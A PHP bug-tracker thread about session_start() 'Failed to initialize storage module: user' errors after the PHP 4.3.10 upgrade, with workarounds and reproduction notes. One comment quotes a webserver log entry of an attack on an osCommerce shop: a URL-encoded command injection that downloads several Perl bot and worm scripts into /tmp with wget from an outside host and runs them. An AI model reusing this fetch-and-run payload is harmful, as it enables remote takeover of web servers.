ID: 25876 Comment by: onno at triptic dot nl Reported By: golden at riscom dot com Status: Feedback Bug Type: Session related Operating System: freebsd 4.8 PHP Version: 4.3.3 New Comment:
In 4.3.10 with apache/linux I had this problem by simply creating my own session_id and set this using the function session_id(). Not doing this seemed to have helped. Previous Comments: ------------------------------------------------------------------------ [2004-12-27 13:34:42] mstuhu at web dot de Same here (PHP 4.3.10 as module on Apache 1.3.26, Redhat Linux) for Squirrelmail: Fatal error: session_start(): Failed to initialize storage module: user (path: /tmp) "session.save_handler" is "files" by default, however "Registered save handlers" is "files user". ------------------------------------------------------------------------ [2004-12-27 12:34:15] mbi at euro-ip dot net FreeBSD 4.10 and PHP 4.3.10 How to reproduce: - Running a system with about 1000 virthosts, some of the users use PHP scripts that configure own session handlers. - Most of the users don't configure an alternate session handler and start their session with a simple "session_start();" statement, but some of them do, mostly by installing some kind of forum or weblog tool. Users that don't set an alternate session handler or set their session handler to "files" via ini_set in every file they open regulary get confronted with a PHP error like: PHP Fatal error: session_start(): Failed to initialize storage module: user (....) Putting "ini_set ( "session.save_handler", "files" );" in every file with a "session_start();" in it solved it for our own sites, but doesn't go easy with all the other users affected. For us, this started after upgrading from PHP 4.3.9 to 4.3.10. Putting "php_value session.save_handler files" in .htaccess files or Apache config files didn't help to fix the problem. Disabling all sites with "user" session handlers stopped the error from occuring, but this is obviously not what we want. ------------------------------------------------------------------------ [2004-12-27 11:45:40] anilk510 at yahoo dot co dot in What is the path to session.save_path ..please let me know ------------------------------------------------------------------------ [2004-12-27 11:41:02] phpbugs at expires-200501 dot dpits dot com i found some interesting. here the php-errorlog: [26-Dec-2004 15:37:40] PHP Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0 [26-Dec-2004 15:38:47] PHP Fatal error: session_start(): Failed to initialize storage module: user (path: /tmp/php_sessions) in /www/x/main.inc.php on line 20 and in the webserver-log i found this attack: x.x.x.x - - [26/Dec/2004:15:37:40 +0100] "GET /shop.php/cPath/2?osisSid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.0" 200 29102 "-" "LWP::Simple/5.53" (it is OSCommerce-Shop) Thankyou... ------------------------------------------------------------------------ [2004-12-27 10:34:09] [EMAIL PROTECTED] Not reproducible for me with Apache 1.3.29 & php4-CVS. Please provide more info on how to reproduce it. ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/25876 -- Edit this bug report at http://bugs.php.net/?id=25876&edit=1
